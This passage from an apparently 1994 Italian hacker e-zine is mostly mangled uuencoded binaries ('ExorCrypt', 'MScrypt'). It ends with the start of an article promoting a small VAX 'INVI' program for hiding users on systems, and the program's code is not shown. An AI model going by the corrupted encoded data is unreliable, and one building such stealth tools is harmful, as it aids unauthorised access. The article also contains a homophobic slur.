M0*W<H)/RZ7@$%P>'GZ0%9=S*+OJ_7D6[PO#?+R>?'Z3Y8K@-R[.QMQ)FFMW%Z...9GP'h M4Q0!')%7%&9R?'9B\TE6N%>U82.[MF92X99\.FQY^6H$<Z`<#^@:]?`]>h MW-+?+^FE+?99J6ZA!N.F].>^>1M?<B5.<*F/5L1h M]LIBPC]XHHZD>[/E.G3T1T]-S6L?9NXVXU]"A:9U^)@5_1+$XN)0.

>2]V8F"ZE+&VTW4RJWPO?Y'h M(H&G(W\XPO@FP['N9*B)R9%P!J=["&5P%6]$]'C&7>"(V_?N24I<2-MP9^'Qh M&0A&J.OD6FM_GV.!DZ)N`'E9V.TNWA:JUK^YTVD1h M2[!&ET]Y+V-\B3KKK6]NC2R-C?9M7O+"]N-.MH=@[.^<9.UC.!@\]@`NC3R7[Dh M(/*3!&_D986\H/O]`'])L!9L?"Y"$NI>6<?R-*NVX$/IIBV[1E)XUY?]K<@Nh MWR$8.JTV^Z^.>1E6TUTZL@E/00+5^:4Z[G->U=-&8QO&Q0J/9C[9!"h M<C/_UYP]=$#]YZI</^\!_Z:&B></_./"<77RQQh ME9@O-`\!L#WW3<`^#5D.<.R.#%KVMAQ.?5h MTNO[_)M.ONSIGQ+<$K/<H=?.Encode v2.DW.BKPW#^ZK8:V8BOU=[.Rh MU^[@3U.P-Y#C*NN&F]&h M$?Z*4N?(RJ.KT[^$4&!"$(N)H.8IB?<OG6T@Z^.:$K$CL/5H$?>N0-[UM1GG9-M(-.h M]6+#X-?3=E`.]]P9Z1P#DQI-!W)+Z..6/AL_I9F'S.A`%/.S!#W[^:0?CCL5TQ@K6%"'=3NK:3/CN@1V5[.-PEAFKB#[MVT.%6VVJ@?<]K?D]AEJY3P>.W%/h M="VPY+&Z6TKZG::L.%JRGJ?8BQPEZZ@N[3<AS70S1J7J#+B_G"!W]V`2h M\E4*9N-H/.:APJB*K='QR(^B]#!D^I%W<Q/85h MJWQMTYRN%V)8O)>B*[P3TW4U*+6^M]9KT2-EK9DFZO?!14CBMM-.7$[:_])ODRSY.)S3ZRh MYJ!B6[767(P1`#$A#8?J=7\QNKJ_FIO!1\&Y/._.`OW>V9#N&Bh M0\S62KA8\\$2TPM]//6NZ@NXVYU]=:^<F)I\!N)II<V)I!@^?1@P:9(^4]M=h MRB=H<28\P\"3BQ.MV%]K.Qh MZ-=L$7E[?(V5O=:ZX>%X/5PM[F@CX<-U<+K`(/AOMA?6]]KM8C67-O.)W.?P%E_P%G#NY5&WEZ@h M3F[JXS.FACCTh M\LZ>1]@='OETUW-A(9S'-MJ.^<YJ.1K1M/h MO.[BIPX(K*T0TK?^S@8F`'+M3&V^OIH1E.B:P[`/^#h `h end ExorCrypt MSdos version: -=) S.2][F-I?K1\/(X=7O&]J^_X@.WPXY&86FF3+V9I$7USK4:[.."?S`5=[-9=IX#-\Y&7T)Q'_Z<.NY'Zh .$h M^I@KV9LQ7+(U38VZU[_@'(UYY#OJ2->=FU>*)Y\0=^<2KF4V%S4`+?A9^L<)h M3T_8$2#NCKQFW.V"__AQPZ7V]3U076&"T3MJRh M`>ZIB<!_`"4YRK>:#Z%L'N/'Z%QX^)-F31"2%H$+<3<L9U^[OBV68`Q'9Y?^h M^QUO4^+8_XO^=C_*3+KFZ'S`/=)`\]`=S>(1.'`MQ)[6(DCQ[HK%DZ/4N75B'.ZVD5.Z<X.]/3U(S5555'?_-K+^EOZCLh MQZK*RH<QLS6WVQF7E/JTU_GC[=:Z\&^3&&MN`8(.F*0\H/-O"3EJG.WB-/?6]UX0L..):MJRSF2/OYQ0^"D[SM+O37][.)M@BJ]C[$<U"19^h MQ9C8`]O.L)GAh M2[ZD[RLNT.3@#^E\0#\7J`-2K)B+F9U0\Z4.^@+[*>FL&T=S:.QV'6LC_4_^?0-I?B3_h M[NA`)6N+_W\8K6)IH>LZ/_4_)LUA_3^1M0.QW^Z3J=9%B.WFVKM'_`B0((`00(D#?#___$"`2*.OY47F=K6[5):\^"URY`[]=.'&F?`$4^'1?C8M-NXWCR51(W^<2TIT_%N_WE+J`h MGK@J<:2M4:A3C!\F]0NE-'X8J<VXYB]*XYS"OF?L7'TQK<V@(3#-8/"W5W6Xh M6ZDO46L#=FK&B>8O$PN^ZF+X6!K:%&HXOX(&['2M^12B-!<P-E`U`5CWZ'.@XDMW4.6Q.^^.<TWEU8YQP<$>[F3F)@).9QF7%JMMI!LVT[73R`9[.M.?30BZR3+*!3G<RQY"<W-+h MJO`W-+8ACB9>\CJGI.A*`=A(CZG3Q]5IB*OB2+3h M4E4C&1)FMM]?I$?&@R<DN<#.+M*NL1J_"12=YVO:W<777UW.M\.?.6)VR^$.6&`G\I^W\W?[9/Y7]OX[U'_\?MDO)h ?Q@O.4L9K:E+$_H'G^YQU.E/>/W8I_9&?I@(T\3R8C.PJ78$5*%CJ7807B?(J_/^9^W&TMQWQ_?].X.:?4D6NO+h M[8ZZ^UU[>9G=_]9]G6%`*F4BQ(MAPN#ZV)B<'V["+$B1.N$_Y(^\0??-'T%W5.G6X?"08!$S3E]I..<R<Q:DUBS>9N)!USDW'3N"M$h MV6U$X+N4KXYD=#S/8.:UA9O-:S.S8TF/A]#\XZMM*A<Z.!-ZXQW3#GT#BD[Z:I/[VCLY`V&KM2"CM%$h M9E4"9S/.zip M4$L#!`H````&`%*WF6F[C95"R!T``/TM```+````35-C<GEP="YE>&4/`!(#h M)!4V)S@Y:GM.M\9N(OST#>2^S'6%ZA\GK!0RUT(Y8'0GTA99U(.I"])OR>h M+^D+T!F`O334(^(<BKF(-[GK(-GBP???@Z^E_4??C#Z.13DQI1=YR30Q.F&-$V_J-@^LK08FV$V.'B-D%DYT^QY'!8O9<Z.9@DKW#67"=!5?HMDYE3YJ:Q\/I?1J]T'\h MHY:<<$J27%_467.$C[!.VG5OUNM9h MO_J?LP[_[#86F_J<_R/B_17W6_.S.$N#%^E-.@%/>QDR0:3&BO)?B+h MM?C8O`.+7Q8E<<-ZZV_!h MK%8L.Ph M_/+!E608HX/*9@0X-2'2NYDK0:HO+#%NN?NAR8.M+U(G..U.N)/N)6JP`2^%.K82KQ37=Y_$3&=XC>K_EF$\\<4&%WX`:EP)1M6]H.+>&=KNQ:K2U30W$TV20.^h M"KWO$P+426.h M1/P[_#OM`87P!."XZ<PJV<BV'.L)6+7UR@:SOXL.G2UIG`Z-*F9'.%I8I]6^%$Z"E[@L]2^`:+XJO1]7.V_VG[.5 (=begin 777 MScrypt.)\]KR9N!?_E\GNK![7KD=/\WD_RBFA-/E>3JK".[SN].2.'+G^M#EKGR//O\(X<NR]Q9GXVTKh M`.TSU#_F^AR&W":55Z"6]_h M(R.1O6Q&_GAY]7_P2B0_2X.B*L5KIR+7\+@[W.=B!#5ZP%h MC]0"F3_N.UY5PHGV@\)TH9@HMh M66X>=.LLF?S`&JX^Y53T."N+E^:>G>7YT6P9X.W?V+.6@#]Z&OK`:C]Z?-*W:>:+TQ\T7&.[^.1NP(]NY$A_$(YS$^h M.

P@S/^/!1`F7PAX"?/+G"]V-IQ=W.=3"5]X/[!\@1+D#?1&OW_'UP.N$4Y>R]G)S@3h M&/(1"UP[.T\U4M[<$'=':L?I+L/\YL_]^FMLW.1\\X^Z(Q^\KE`X.^*N"-\Y7`[(MO_C]HG.%O.=:V"F1S#+h MYFA="'Q0#]6C=R*MZQU">E88S^[C6.WN@ENDRO"15J<]V\_7K+3TR%RX`*[V"RGWTE_]S+`<I>.2='MP_%Z+%C^@["H`-!77V_YG$/YB\?YN)h M32(%0.\H.FZ9[E"V^.LR-T.E](K@P7-U*2JDF*Q!3_>A@h MXPASV@01R)L3:J]?SD3$+R!\\@X7PV.F5[#S)TQTUZ8.<^70.3=F.DG1D=%F2M?'P#?h MX%\![R>Z71<\S0X>_#9XM/3UEQ0OJN+L!UX_&OT<\4(!B_>_4OQBXJ-D^\78h M!^[CK`.h M8\'<4`^N?".Yh MO2(K.Xh MUO8!3HU/Z/4C\6M\?GE\`'2&K=]!*NP+\___)/.]Z75R^ZW"`M&$V#\E3X%R!S4'^=G.L/2'=@h M^NL`<?.X=\UHG]`BQ:!$FT^/:)G82:=^D]:=M&6NHOMDK0-U.'M`@`H!RA7XK=G5@`_0T[*U$?!_P8"'K.B6)*\`XDB:I/_]3KQ")GM:QS\(?.3F.FYX^H#X&):2[0h M50*.X>!XROHQW=J%W_V_6/h M&PKSC8V"@O[J!^@-6#U=C_^H'#0GU2]J3W_'E_=K<-%QRLM?[QP2V.)BE0N1)'PDJNR5%[N(/Z"%X.-)?%IG7XSOMS%3Y]NKCA>/O_HZ^7YZP.'%K=1UZQ537U=?6^Y#.'YSD#4#:B'0''C6B@h MTBE0\US)EX"6'.D:?+>%GC(A%ECSh MRS+_D64@F_B80Q#:BL=0O('B441GDET_^KX4VFQ.M@.AFW1h M=KGN'PBX85-"6?6+Y\&^'CA7`'%`*HB#_!L=/HBY9YC4'V4/'#.3D0[@!'Gh M!/YDO0<7>/\W@/AFW>`!DW![$.7-?S#0>9JZ.5`'I2LN.N.$^<L+Q3L+:AIA(h MM`)I`]'LO]#3BZ$/--#(RZV9TT#A/+=DP0>W>W3LL0=.T&_(G$+%@@5/?.<@$]3'B&5)2MN*=%%/7_TEQ$D..\?]8RP8O?#YA^%:!:O/_Ch M#N!OJ)>Q>QW^V`!HK&OH<5HH_>FFT`(CGL7INW<`09^I>4!@:`DQX?U'CR.[]1O!M3O=(KSCZHP!TC_O.ZBHFOOZ=D'\R>X%6KOA$&7/DOY.>M=@>A]8&MBH_Y'`J]+$.!XP&47Ih M]F"$VS\(D:X6R-<CD.4JM"\<.!>h MV'LQ3>7K&Y3MN/>.[P(.$h M.NQBGWLK>?<$I5_05M$#87VGQ]M.>@1=SDQ.=&#*LF)X8T0OE*Bh M`D.[<-O4<Z>[[`]^F_!K1!/1]JWU6W5<MT[.U:SO'$#+$[09V*=9@=:MUSV(%:K-_Q.4=F[0_7#HA4h MM?A[0&<H`P1\BOI?1DUDJ.QZ^TOO][./@"K95.P:CE9>8[_[*MW+W^A]FQ`h MWH#2+*[U(1GH^)`.`OC4#G&^:[L+<__\T>?FNZV9<7]Z@QP-A?_^W<("L.WY]0PA$2XGT>P"`>@NJST@$D#[=0)CO_X.C!G!G.*@ZO@YS8M@OIB0N8MY5P'NM^8Ih M(</.E/C!76VHS>JQN.5AA1T1AH@@ZX]I)]BG]U.^<"F>Z9G">R!-=W'REM+#7A"=Q9"2@MM2><5T3?'^UZ!M[3h M.2>=-*OH*1^6DK8`7PLX_72(36Sh MTWUE\O7&(4D[X/6_$9$=)V?F20>$LBH\_0(W<7UGOD^.`_GI[K?KD3SBXMG8M/=L8($(LR/S!Rh M$RS_GXE9-GMTB_-P496X0O)U1X"IPGZ@W`9H?.!X_4YFBA``?>3R2T.L]./"_8H^[H8!_&":.KV`O8.46A%UP_4'(/"<\QK`Gh M[@I(7\<\>E.XR1Q.Y_O88$OU=]]=W<6O4'h MA<"AG#54J%/1\V:0$GPQEXOJ!!$?7'\14BK:Y\62C*`*_Z.3Z=L4>X*3O'_#)?=7.^#ROP-.+N!_!L-7X&SR(V7P?26G:!@."6DG2!IBD^@6L7!T(>26P6L`AG7.SGT.U!LWOWNY0LPLT?C!"8`G)D.>!'h M\N?XG!T*/*_!+]GCJT.^`0O\)9QD#@"9[$3Gh MC1M4M['R[-CLOH46_"4\^D3<S)=&#QB`G4D":YZM`'%:4#8W"P"99+.NIP_Y_K&FB\*!GQ4_^+Q_h MV8`2W`:4=L`_^K>Y.FC2.C.C$].53h M??(2UG\$[).X.P%F#J.T]GF24OSVLPI0_+'#VQ^BC6\G<&KF"7TI?G%Z1?G3W*9NM`^78B.:[U\\h M//KX@=B&MW_HZ&SS!$-=.A"]?P_1CBBK2_X'T.@JSE(V.^>(*2ZMY?-7=2M!?W_S_&\'[/'"E"17S=V"GJ@4_N+L\.-O9O[OR"0.-h M%)F/WI48`ZQQ?&*/IX+:8&J`#C\X7U)W6@+1F?UBAW8%CG?IV`!3FQCS+`$6h M-XA7(&/M.#h M6?=R1B"0+%R`5$A4>-`.L*[(Q=X#KS.`WCY3+BSH1>39_%M<.>@"'Q\S-\B(3:]/K2^R>h .Q$!G_CL0E.[h MNJVQ1.=4-`F9J$.G=0-<h MH/<2[16M=1?TLJ7R!2J[^+"G"(":TS40MIS=8T^0EN".$@XD+7.#)Sh M`\4&Y@_PR=.*9O6M>WKJ\(R1KW9$V/LN<!_T/&.C:76h M/CBZ#9T0+A*%]1>]#)2D_\7]HY<?X+A_O/H[P>.S5X/^.-V"@!]!#W1IWO.BC2_.25G&^3L<?<`"T>Y/_.<&>#7Q<^B'X@_L0M=3[=Vh M[(WW3SI^8F">.7D+>AN:+C:O@](P+TBX%:<6LABI:((&Q\?81K#N::UG_@VM.>T=)^$K[@TM^3-$TA6>^HD0?03h MU&E^ZAR?NJ-11^]2E[ZU+@IV.=M.P1$-V0F`B1[P)=QAAR\!3$5?(O6'^!*(CHI.SH&/BY#4('(C+C7PB`]`h M:"U@!O<6%]#Y@<&(?O$A^A.X#7@8K9RY'L/.<!4OK[@8B(F/K:3[\/YO\U8.<=XBD\h M^?3-1C?0#(>=?\!<0J_8BIS_T.WD0[Y37)VT*)SD_?7'PZ.RS?P)?"4h MKFGM!KY$$9GL>P%-.J8/6ZY`-&G-&CUZG&C^IXCh M7A[QQHTZ#CW8+\&!?`T4.3):21]Y='!@.Vh MR1W`%FKV^]$71_^EO^_``!T1CK/F"9+N?IX)Z=[GV9#N6P5H>NU1)]**3MK)h M23L7:<?*4R1=DCRY3(*%KB<_."D!=Q87VZ6WZS[J8h M^TIL2GJG1W<@/?_'_P\?98BG__"Z6YUI/U?O+9.0J:E@3M!'&C8J8+h M.99ZXJGE?C$_9GE[-2'8"9&/]-(*K'&*`]PT`.\J/B`h MDNWLK>2MD-./RJNJ"KS/*_P4`[@/7YX4DS_[Bh MV[C]FE.)K9AMZ:HL]XG]OT!#L>Eh MU(ZQXUIXVSQNT"C`L@5.2#]L?.![\Gh MN+C@PJ("Z<K_WW&]^V$+7_FEAO_!Q7VR`]K4."K7<*h M.FLWh M@*?A]4GM$.>O)6-/CK'G0@)"67CZ0:->/6XV7R=HB]C(O<T/J-.6<VX6=*EQ+M_M%'V=H1L`VK.@]EQ3'*P.#E=&5/KBN6U]Q1#_.0'.=!Q\YG^3@'L"h MI.

M^^M7#OU((/UD@GY-T"^G!#=$"O1Z]0V2'+"BKWM$,P%I!FM](AFH/+U?CE!Dh M%2DIMMR``!9D?:#7]5>CA2FLT%@FPAR0H9BOVP-5WMBP9_^C=0!RD_#1+(J=h MX&@0$6&#-@NHX&Z01K&G.T`&S+/$9SJRPML@SH(!#,]'HRPXFH3P,H0W(3P,h MX5T(+T(X'O5H%?D.M""(W9UO0)AU>1IA5ABZ_XS_5_2:&Z@/.O4PST4T2A"Wh MZ`1"T16V84?]^@?%_;\^P?4MZT93[NB-*B:(B<EO1="J-'HK/<@%/@`_,`H4h MWGW,`^S+P%Q#)7\?^RCBI%O.P9EQ<'M=`T21/%T,[,C[:B/]W57_COHQYOI7h ML&3ZOP/OTO8>&Z+/O,=!GV[-GFB(!]GCQ$2T<#G$<!_%B1A;>J9U`QHI3OF-h MZ2T*T!;)]G''"N'X;<>*X/AI27MBPYS]]RPR]`I[=%ZSP%[P1'Y"M:8'63O(h M1=N:QGHZ")C_#=ASS';']PS`[%*8+\&L0`.FSQ(!)[?X_A,D>DWPCZ&$4*D2h M@6G2\(,L;.2E9P:[=R\"=Q]JL#'XH47?@Q^V?R3WLW:]`1B^WHFZH):A1_>@h M1UL@6C&^)N9RX;CD<GG;IH?"$C3)E)2`G#D"?Y>4S`,D.Z+9%^5240VLL9Y0h M'6W9YD@GH)_'Y*N$NW:!'!3$4UW`NU'!QE+<$.+V?*NMN'4D^[J`(9S9@)BNh MB'^*D$OZ%L>/NH<SJ48U%75`3P!HC@MH3:?$F$U._]OXCFY23X^C!S$C^+PAh M;PN+HZ_V_8GO2[#[H;CN^+\GF2PI@N/+`N1SA,\T@&M3?#:F=&VGB_VOA]G3h MS;=*@L)OCE7>\7".%=[Q<\;_W+,.LQYC'@_SC!QQH^LW0CZ"0<KAA8;KUCO,h M5QJ'Z@%@OWN`3M5[E6=Y=.W\\H@QNV%_9+!/@L>`FO4]C+Y-<XA.=04_QZQ@h MK,]6(V.%6/<"Z#--_*H`+WIBJ_Z`*(GZBL@S]/:/T$UIFR?2#AZ//IB)'1%Yh M[N&P9(J^8'PZC:[KIJ@^DK>ILX#1O*X*ONN_+PFA!.Z-9>R-L%N,V9]A/E@Zh MP/O:EJ;`'A\6#8-P?&?'LD;G$9G`<W\Y@,:1F-)DNH9-^OV"05('M_=*9"IOh M>B9W/X-A;8_`M\0X6;7IC!Y2V<,H^^!)0/^_]<BMO=9=<4'$!":.'^09ED^Gh MSA*DD2[>AX"X;KJP:(JA+NT%E.9T/C`#*MZ,]%7`[*ML`;(DOQ`>PA4-%2I%h M7^*'9D$YCI\100M)/'UD`%,$J:9L5=\4Z8J0F(BBAXNG^N3X^K0^H\:-HK1.h ML#HRZ.-^*>"<VC8VK6]Y>4I/?Z4]"YV1`@7F9VN"$_<R@G:]B9>I%8WN=.X7h M@H$;LA%J9)V8WJWX2G^VS41V>MJ#88B.=GW"XT?_AMD-1!:E[0,#H!FU\2DNh M,XJK9P2W8C^BP0T+IB\`9([(,$0)]D8A:@.S7&9J`U%FTI0HNPU.=QO)";X9h MK\/8"G^+5I#H"M:YA-AC"4#:W"(6,,K@TA*(IK!)+MAL3([@\JDPX!.<YEX%h M7!PJ#8B8VP.%C0K]@K/T_U.!>!V,1%]\\_]!1"G1UR^$/.6B:L1ZF-"!2.E_h M-<]:SXS;+0N9Z"M!DTDXMJUP^QF`>_G;4-IM&.;HL].[YP3NI=(-8;L%L_'Mh MH+Y?_,-L+V"V<PN:/M!8'M#`94`+>(G,FX:ZGD/6`H<)FDA))N3W=`W_CRX#h M6^EV`!NG=DXYR]EH:6>C$9P-[L++$6VCV^NJ/L037YL6QY'*]17!17ZU);K;h MYO].=AV28-(!GZ@>C8%BZP2-0S-DE96?]H?O_YWBDV:DE8/R`[E'9V`L)A$*h M>_1?`1`MS$PV5@L@:=I$YIYJ7\Q99KN^4K8!JG0BM:GG3+G'L4[V[OXB!]V@h M5JC^U_J['!3/9+%O$39),*[M.J)M2QW&#6/9"Y3-I,PO&$_B*,6EL%]/H'L\h MW7Z^7SJK*4@#(IZ9>95U'U@&_]$8K!9'"DG/TBT'9R,9.>9A\JU!?,Z_,'/,h MMFE.S[8R*+G+6<8"'#U<\`.*?2#RP>EA+LYOY%URIG7PA_N1?O]=(6<B]`>.h MQ0(\[MNF0,5.3,DA>0RYF>O`L-LS;"E`P)W;9+M#$#",#JYKH8!B/=I.'#>6h MDRI)&_N8:DP%]IW!ZV[3)\),U>T[/0*S`5K3`!.N5WF/\TKS=)&PL80Y78TSh MDR^.QO9"7H#E+KE>`8]PAP,>[!.M(LR+8GV+^=?;4(16861\`>.F37A*$B)!h M*<.8M*_'EES`W2D"REPAK:*ES9\"H.Z?#H(K;UKF?T2KH!!C&B83S@%T\`-"h M4!&'FF[?8(\%O,R.V@']3Z#%Q9"GW:/_N1*J4V6_'QQ@`('CH0'F3S_Z_21;h M6,3*9R?<];1]B$?W$=>CL[\?1AL@D>;M"T-R'O1.^0.UA_1`Y+TZ@+4-[!S.h M'5,/>%SC\K2!D)_^-X!\.=OF'Q*7GX74;GS7_BFH%E"R]#/`7"36Q$S?S]X(h MDJ;]`SG5]`J?\G\-D)=TVX335)R8GCE:2$@9R'.$Z$D#J'@CJ#K2*\L5<0-4h M*^!P8G*"M'E0V<"^N_M)W+`PG!(X1:)<H9%RIF>7JTW<JIPLJ`L>X+4=</(`h M<&D`N%SNKRYKW1Y`QJ"TS.0EQEU@;`A/.P*=8>R#^'RN($PTQO3%_2N@4D([h MXD=,B$:&>"(?H1RZEL<:^LA@0!Y5GZW;`H7H/-Q@/L]3M#.!1=G'AT&`9<"Oh M-;!/LP*M6QL4MX@&O>M8W[BD<^8J?1_B\L=OQ+[NMWJ%]):_Z%)'/KXD+;[Fh MJ0#&VMY.D+5.8I,V#R)^H%DPM9EUP:/BU_54%_[5"T>Y_>#\`4AX8Y_N^O7Fh MF!;!'X/E\_O"01B>(8&42QVVPO4LTEC'#!H?M@5#53O3=#_@@?H=B4#,#:;Th M!V$W(,O76R)62M&R6*_W#2#-'$&:\0-HMLW]:#LNP^``]`+4-]"7LOV;EVDWh M2+O'@S-NR1!+^;&:D3F=M5E\9%(J62W?=5VEZ*T#[(D:H%TD2U3NNLQ\CYH9h M[:\;D(Q=_&)J[5L\H.ZLR.P,=^ZS:]7BZ:,GL>F+*:OF5-DS`E0U=*!D"6+Th M#JH7=VFOM[K>*&[^_]'W3@]U:A1(?:7R\1#JLMM5N0U\Q/[R[`:S;L52]<,$h MLA6!>\`3O>`$9&A\(+Y"Z_"=XWH#L>HK<L/2BNK3<V4WE+64J-#N=?7L"%^!h M$#Y);H-Q<$+3"A=K"YI\%C1/#C!K:/<`=Q*?:W`EL8WX_W!#>KV^(YI3OG!;h M;?I3?R$+?76WCU7LHWD*-(TK%4<_Q[`OP'[F]22!DK`@RGXT4(&6C]V<2,'&h M"'#W9U@GMDE$<9T@8^R.@0F@_N54>'KG`(/2U4=;)GF[GW.XWQ7(OY6(C@2;h MKE`DC/P<$#GT@?!;-3O-@<(@:'LQS7(^>G/?1?&!^1,S*?/!D2:JF;:\O^5^h M><;:&4??&<WB;Y*Q1R8;YS^E8)/&#4H5,(7NGFX)^8ZFP-[?U=KK:ES<U=!'h M$931"3K&OIZB2?\.]*LQI37CZSN/2>V./2+)ZYOK>7VU@2\W<7RG,=289$"@h

M0#&C]R(;[K^)`#\'B.N6G3I=GVG>C#J8T9L<550DP7SHH.3#(/\B5-8!*?:Dh M08/J_O_7Y$Z+3@50M*.KBQ`>?*!QN16.JO2_+WVDL`XQ>@9.'(%RVEXN_ZS#h MI49%WT'K"$1XY8,_4)X1*:)>;'WE=:6)J_K'FE7K\*E09TKW*%4JE)SO4`U^h M1/\0P(@6C/!'K5M0[872AP,X`\N)]FK7Q?D;*8!:*!)M))@Q^BR/]<EU$.PVh M,0-$HN9WWM.13F2B.P.?-5"`7N?:H(,']J?=ZC5T*2<&PBK_$:;WX.$/HV^/h M/7#Z>MI(+L?3[S1(I<C3EV1P3W1\HJ,-K@]4/E7Z,Z#B.8`4&C*:K"M/XN5Sh MUCZ0H]R<BZ<[#M9V4Y_3HY"N-Q$UC[XN6*@]X<#LH7/Y5J#GM)7@MDC;UELXh M7_(AA7.TV-7%UWI/%Q&TU"[0;#"^'SUII,D*[C3(^ER:16+(MF>>N0TWH_3Wh M\TQ(]SZ4@U$3YKEBHA1]SKL?6<*4NS'Z^.C2%R^S[UB&A>XG7A\PP$HJC87]h M2:W0(%CJMRIM<I;7PR<06)2A:M^(@_=E$#/@+0K'4;MD=G8`%PV)8"R;8Q7Zh MOR@@YNMQ3''TZ6(2<P3>@*)/D*YZXP4!A-#JH>'/3Y.,U-Q=1=H@W?3_YC2>h MK6KP$_@(501_=A#@+6B9^5#LH$L6S6`L\*\!AJ%],K2)M06CIJN8B+V5O;O&h MN@4I=09CE9%'!S\PV/`%>C?KV0,F:_`=OPNF&\7>5F,)5CW$1XNG;C!"QTCKh MDAY`].W;11NY?2QQ#U*V4RHQ.>$8PG;=!83O;:X-P/^#68:9C:X=NSX4@-L/h M$&\]=9&+O0=>AS??Q_/*8E-L.#*5=VF?X.K3J\L!9)*=O?T#?QZ!3:)/[JL=h MJ9$.Q6M5XK68M3V=-CZR35$+6T.EQ4MT#+N@N[`G`,`$9SKA`*OCF4IW>TX7h M8$:^47N`/1W1*X(H"48I;*:^!/FZ0_H<6)[OV+\%<_QOEXLH:&VD=WMK<WAKh M+T_:;)P);^]:C5T+TO)B`GIX0"^/2]0RQ;3_A<B':;V;P&SSZ_OK#T)"U@?@h M'^E\5U>:VL>KW_H+RKCDJXZST@207;3_S%*A')&:^0]H\.EEA1%<Z24_/0EBh M+PG4?+::;I4N\R=KKZ[=A"W(=`M`=.T`FD??7`"QDQVXXP/WE3L*8A+JQ017h M#/@#3*)[=2=S:3+&\G8?='<ZX-%%'UX.C'F9\ULAF)<_7R_PZ3JB)DCTXOW\h M\G^U&/P$O-5<$`S#N8#2>75Z5=ISL/@K6."-<@QRVID_*6&<X7IU5_O`8UF?h M(JY4G'T.TL'GL"-K'QZPH%/<%H>D%_H(@#W:>G5D<<ZO+/6^!RQ5T^O8/7G#h M+G8/R!54GR/CM1?UL'8?+7CC]/0&`^R9K9[M^T`Z,6JO]()$%9#S26MD1]<Ch M[Y&7!SV:D^>=&\#MZ9OO%:<Q1-%72D^/+#`E(:^NMNCT>/]#>C:T:U(-H;^Dh M=..<[?UU>LL`(97-!UB2RA,;7<=P\:GH,YV0CN`)FN()2J+KY0^@2O$1I=!$h M?WE'(7=>.TJ@Q]$$.">=Y5_N#/+BPZH#Q(WX/3,`;&O+ZQ1JGP'MB,PBY/HBh MY/S^"-F(C6ENQ('1_1LO:E#(IWKB(L(UX2)^^(^UX>T&#JC['(;M[O#_-T'5h M%Q``+^[X3R-^H`'V*SJP#C1W@QD)B_VU@J#-Y0ME?^5CS'^R`HZ=`GX^)^]`h M#^=5"+NEZOO;2HFA@B4!W'"V"[P??Y)PJ?#I!&&@XG8%$CRI>K'PA</KBO/Dh MG[(V1/9$_S<F&H!A+5<^%I%/M4)ZZLQ_FJ[`)/$C)<9N,:=K.4FHH@.]\NY1h MNB817*,57#<R3?(,PAIY=O?VB[&19<8F<<>A;">609O#\VP!Z^C87NIUZ7$[h M_/MF%4;2@/V^^8'1Y33$Q+][@,9TAPG:N;6&WO(36.#:9(&1YEORS(4CV$IVh M6/425%-G&KD0C:WCM*EC1^8L43_@F,7A://HJ5><#/`0F@PBAB;#+9D+4_YIh MWB&Z$90!&QF497@$3D8N<+*\Q,;\1JL*BB=0O`&ALS+^=4M8-(!@=-.I(*76h M==N2:MJV94$R32M6;EBY>4&V!#GT+=R\<M.>14L7),JQ*4'&S(DS)TN03=..h ME?MV[ELSTW4O%RZ$?A;Y#>]6@--PP8`#L*CO'/K5:%*F1;\F=6KTR3E@4P08h M.'#@@`&V@04WE0^)AH8B9[60<L?8,"%#A@PBX18M_I?84`)CE>T%AN5H7``Rh M*6#*).$!SR2!,0.^(!A`@,J^"#B#8``+*DDD2K=UV;)-88ROT+Q'N`,+PICFh M:2`8P\;1$@@6>)#A)BR*QW`?TKK#>=SMQG0)$Z28VQUI6KIMP[H%F91N6#:6h M6F$^A94NJA-DR;D@>29U"[>.^6;3LBWK@SG2F$XS<LOB3+9L%Y?J<@$6E>,Yh MRWF?+AK$/LT[2CG_W;X1VZ0^+1GS[Y3#OD$:80ZN''8,V.8-?@Y8TV&LLD?#h M6H,L4V3?VK7GGNK0ZOZ29(9]+DL%Q:S9^^YH!\'Z+L,R#P1E*W80^Q*</5>Qh M)I1CC#9%NE53Q8D[`*/-CX/XFE8I=D<S+;8'-TOVNVB^K"A1JM#WE2M3>NT)h M$V])O"E#&#M,F"G:2;EE%LYRW:(4\\S[#)N9=Y-G@UO+DA&"S=FB=8XT1.O/h MTXFO?=2GC^2EVF!ZF`T5=%YL]K%KLKC=LG+-LGU[)WJ``[;YC&T).OW/8`^2h M;%J[::9HL&_R5@`&SG.`BQBU#/%U;K6CAW-TXIM](R=WTQX3=N,I]=?N_`$0h MFVTL1U:<CJQH&30H"-$RHE4&T7*WO='=G@4)]PW<-C6+MK<G@^\!S'F,M=ECh MFS@5E8>=.X>5$QM+J/\'4$L!`@H!"@````8`4K>9:;N-E4+('0``_2T```L`h M`````````````````````$U38W)Y<'0N97AE4$L%!@`````!``$`.0```/$=h $``````#!h `h end -=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=[ N.d.r. Complimenti a Hit per il suo ottimo articolo !!! Speriamo che presto la ns magazine possa diventare sempre piu' tecnica e con piu collaboratori !!!

Per comunicazioni con Hitman Italy probabilmente seguira' un suo nuovo indirizzo Internet. Per informazioni contattate la ns redazione al nostro indirizzi Internet :) ] ----------------------------------------------------------------PUBBLICITA' REGRESSO ==================== CYBERPUNK E SU ARKIMEDE Nua : 2551604400 Videotel : *52181# Piu' di 20 aree messaggi, incluse aree sul Cyberpunk !!!!! ---------------------------------------------------------Per contattare la NS Redazione su Arkimede potete scrivere in CPE su ARKIMEDE alla casella "Dupree's". ----------------------------------------------------------------The Black Page - Numero 0, Settembre 1994 - Articolo 5 Per la serie: Vax, Assembler ed esaurimento nervoso : --------------------------------------Presentiamo : VIDEOTEL

MINCHIA !!! ===========

Allora, premesso che NON sono un esperto di Assembler Vax, premesso che cio' che so e' 1000 volte meno di quello che sa tanta altra brava gente che sta a chiamare VAX dalla mattina alla sera, premesso tutto quello che volete voi, mo' provo a scrivere qualche cazzata riguardo a ... boh, leggete e se vi piace, eiaculate :) Questo e' un programmillo molto carino, si tratta di un INVI che pero' risulta essere molto piccino, facile quindi da mandare su un vaxillo e immediatamente compilabile. Ne esiste uno gia' disponibile, scritto dalla stessa DIGITAL, col nome "INVI.MAR" ma questo qui e' carinissimo perche' e' molto piu' piccolo dell'altro. Scusate se scrivo in questo modo, non sono frocio, ve lo assicuro, e' solo che sono le 5 e mezza del mattino e mi sento un po' rincoglionito. Sono riuscito a fare sto programmino sbattendomi qua' e la' tra listati MAR, files presi da PHRACK o simili, e cose del genere. Alla fine ce so' riuscito ! (grazie anche all'aiuto di 1 persona che resta sempre nel mio cuore (informatico) e che qui ringrazio pubblicamente : 